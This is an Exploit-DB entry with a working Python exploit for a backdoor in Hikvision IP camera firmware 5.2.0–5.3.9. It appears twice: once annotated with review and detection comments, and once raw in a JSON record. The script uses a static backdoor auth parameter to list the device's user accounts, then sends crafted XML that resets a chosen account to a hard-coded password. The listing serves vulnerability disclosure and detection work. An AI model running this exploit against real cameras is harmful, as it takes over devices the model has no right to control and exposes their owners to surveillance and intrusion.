Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass
2018-03-23T00:00:00
ID EDB-ID:44328 Type exploitdb Reporter Exploit-DB Modified 2018-03-23T00:00:00
Description
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass. Webapps exploit for XML platform
# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner in recovering their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
import requests
import re
import sys
# BASIC INFO
# Module-level settings and placeholders. ip, port and SSL are overwritten from
# the command line, userID and userName from operator input; newPass and
# BackdoorAuthArg stay fixed for the whole run.
#
# NOTE(review): newPass is a fixed, published value. An account changed by an
# unmodified copy of this script ends up with exactly this password, so during
# incident response treat it as known to third parties and rotate it after the
# firmware has been updated.
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
# Query-string parameter appended to both requests the script sends. The value
# is not a per-device secret: it is the Base64 encoding of "admin:11" followed
# by a newline, identical for every target. Because it is static, the literal
# string is a practical indicator to search for in web-server, proxy and IDS
# logs. The advisory cited in the header (ICSA-17-124-01) covers the flaw.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
# Print the expected command-line form: IP address, port, and a Y/N flag for
# SSL. Takes no arguments and returns nothing.
# NOTE(review): leading indentation is missing throughout this listing; the
# print call on the next line is the body of Usage().
def Usage():
print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
# Read the target address, port and SSL flag from sys.argv, reject malformed
# values, and pick the URL scheme. Every failure path prints a message, calls
# Usage() and exits.
try:
# argv[3] is read here as well, so fewer than three arguments raises before
# any validation runs.
ip = sys.argv[1]
SSL = sys.argv[3]
# NOTE(review): bare except - it reports "argument missing" for any exception,
# not only the IndexError raised by a short argv.
except:
print("[-] One or more of the arguments is missing.")
Usage()
sys.exit()
# Format check only: re.search is unanchored and each octet is just 1-3 digits,
# so values above 255 and strings that merely contain a dotted quad are accepted.
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip) # IP ADDRESS REGULAR EXPRESSION.
if not ipmatch:
print("[-] The entered ip address " + ip + " is not in the correct format.")
Usage()
sys.exit()
try:
port = int(sys.argv[2])
# NOTE(review): bare except again; the expected failure is int() rejecting a
# non-numeric string.
except:
print("[-] The entered port " + sys.argv[2] + " is not a number.")
Usage()
sys.exit()
# Rejects 0 and anything above 65535. Negative integers are not rejected by
# this test.
if (port == 0) or (port > 65535):
print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
Usage()
sys.exit()
# Only the exact string "Y" selects https; any other value, including a
# lowercase "y", falls through to http. With http, both requests built later
# (including the one carrying the new password) are sent unencrypted.
if SSL == "Y":
protocol = "https"
else:
protocol = "http"
# Build the request URLs and fetch the device's user list.
# URLBase is scheme://ip:port/ and URLDownload adds the Security/users path
# plus the static auth parameter defined at the top of the script.
#
# Detection note: a GET for /Security/users carrying that auth parameter is the
# first request this script puts on the wire. It can be matched in HTTP logs or
# by network monitoring when the scheme is http, or at a TLS-terminating proxy
# otherwise.
URLBase = protocol + "://" + ip + ":" + str(port) + "/" # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg # DOWNLOAD REQUEST.
print("[+] Getting User List.")
# The call passes only the URL: no timeout, headers or credentials beyond the
# query string. The HTTP status is not inspected; only the body text is kept.
DownloadResponse = requests.get(URLDownload).text
# Applies the two patterns to each item obtained by iterating the response
# text; on a match the captured value is stored in userID / userName and echoed.
for line in DownloadResponse: # RETRIEVING USER LIST
useridmatch = re.search(r"<id>(.*)<\/id>", line) # CHECK FOR USER ID.
usernamematch = re.search(r"<userName>(.*)<\/userName>", line) # CHECK FOR USER NAME.
if useridmatch:
userID = useridmatch.group(1)
print("[+] User ID: " + userID)
if usernamematch:
userName = usernamematch.group(1)
print("[+] Username: " + userName)
# Ask the operator which account to modify, build the user XML document and
# send it to the device with an HTTP PUT.
#
# raw_input and the print statement further down are Python 2 constructs, so
# the listing targets a Python 2 interpreter.
# Whatever the loop above stored in userID / userName is replaced here by the
# operator's answers.
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
print("[+] Using the User " + userName + ".")
# The document is assembled by plain string concatenation: userID, userName and
# newPass are inserted without XML escaping. The attribute quoting is kept
# exactly as published.
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
#print(userXML)
# Same static auth parameter as the download request, now on the per-user path.
# Detection note: a PUT to /Security/users/<id> carrying that parameter is the
# password-change step. If it shows up in logs for an affected device, treat the
# device's accounts as compromised: update the firmware per ICSA-17-124-01,
# then reset every account password and review the user list.
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg # UPLOAD REQUEST.
print("[+] Changing Password now.")
# Prints the response body as-is; the status code is never checked, so the
# "Complete" message below is printed whatever the device answered.
print requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD.
# Echoes the chosen username and the hard-coded password to the terminal in
# clear text.
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)
{"id": "EDB-ID:44328", "hash": "a46d95fbd555b173c1b4060a6eb616b0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass", "description": "Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass. Webapps exploit for XML platform", "published": "2018-03-23T00:00:00", "modified": "2018-03-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/44328/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-05-24T14:09:14", "history": [], "viewCount": 28, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-05-24T14:09:14"}, "dependencies": {"references": [], "modified": "2018-05-24T14:09:14"}, "vulnersScore": 0.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44328/", "sourceData": "# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor\r\n# Date: 15-03-2018\r\n# Vendor Homepage: http://www.hikvision.com/en/\r\n# Exploit Author: Matamorphosis\r\n# Category: Web Apps\r\n# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.\r\n# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23\r\n\r\n#!/usr/bin/env python\r\n# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]\r\n\r\nimport requests\r\nimport re\r\nimport sys\r\n\r\n# BASIC INFO\r\n\r\nnewPass = \"@Dm1N1$Tr80R\" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.\r\nBackdoorAuthArg = \"auth=YWRtaW46MTEK\"; # AUTHENTICATION KEY.\r\nip = \"\"\r\nport = 0\r\nSSL = \"\"\r\nuserID = \"\"\r\nuserName = \"\"\r\n\r\ndef Usage():\r\n\tprint(\"[i] Usage: python exploit.py [IP Address] 
[Port] [SSL (Y/N)]\")\r\n\r\ntry:\r\n\tip = sys.argv[1]\r\n\tSSL = sys.argv[3]\r\n\r\nexcept:\r\n\tprint(\"[-] One or more of the arguments is missing.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nipmatch = re.search(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", ip) \t\t\t# IP ADDRESS REGULAR EXPRESSION.\r\n\r\nif not ipmatch:\r\n\tprint(\"[-] The entered ip address \" + ip + \" is not in the correct format.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\ntry:\r\n\tport = int(sys.argv[2])\r\n\r\nexcept:\r\n\tprint(\"[-] The entered port \" + sys.argv[2] + \" is not a number.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nif (port == 0) or (port > 65535):\r\n\tprint(\"[-] The entered port \" + sys.argv[2] + \" is not a valid port number.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nif SSL == \"Y\":\r\n\tprotocol = \"https\"\r\n\r\nelse:\r\n\tprotocol = \"http\"\r\n\r\nURLBase = protocol + \"://\" + ip + \":\" + str(port) + \"/\" \t\t\t\t\t# URL BASE FOR FUTURE REQUESTS.\r\nURLDownload = URLBase + \"Security/users?\" + BackdoorAuthArg \t\t\t\t# DOWNLOAD REQUEST.\r\n\r\nprint(\"[+] Getting User List.\")\r\n\r\nDownloadResponse = requests.get(URLDownload).text\r\n\r\nfor line in DownloadResponse: \t\t\t\t\t\t\t\t\t\t\t\t# RETRIEVING USER LIST\r\n\tuseridmatch = re.search(r\"<id>(.*)<\\/id>\", line) \t\t\t\t\t\t# CHECK FOR USER ID.\r\n\tusernamematch = re.search(r\"<userName>(.*)<\\/userName>\", line) \t\t\t# CHECK FOR USER NAME.\r\n\r\n\tif useridmatch:\r\n\t\tuserID = useridmatch.group(1)\r\n\t\tprint(\"[+] User ID: \" + userID)\r\n\r\n\tif usernamematch:\r\n\t\tuserName = usernamematch.group(1)\r\n\t\tprint(\"[+] Username: \" + userName)\r\n\r\nuserID = raw_input(\"[?] Which User ID would you like to use? \")\r\nuserName = raw_input(\"[?] Which Username would you like to use? 
\")\r\n\r\nprint(\"[+] Using the User \" + userName + \".\")\r\n\r\nuserXML = ( '<User version=\"\"1.0\"\" xmlns=\"\"http://www.hikvision.com/ver10/XMLSchema\"\">\\r\\n<id>' + userID + '</id>\\r\\n<userName>' + userName + '</userName>\\r\\n<password>' + newPass + '</password>\\r\\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE\r\n\r\n#print(userXML)\r\n\r\nURLUpload = URLBase + \"Security/users/\" + userID + \"?\" + BackdoorAuthArg \t# UPLOAD REQUEST.\r\n\r\nprint(\"[+] Changing Password now.\")\r\n\r\nprint requests.put(URLUpload, data=userXML).text \t\t\t\t\t\t\t# UPLOAD REQUEST, SENDING THE PAYLOAD.\r\n\r\nprint(\"[+] Complete. Please try logging in with these credentials. Username: \" + userName + \"Password: \" + newPass)", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}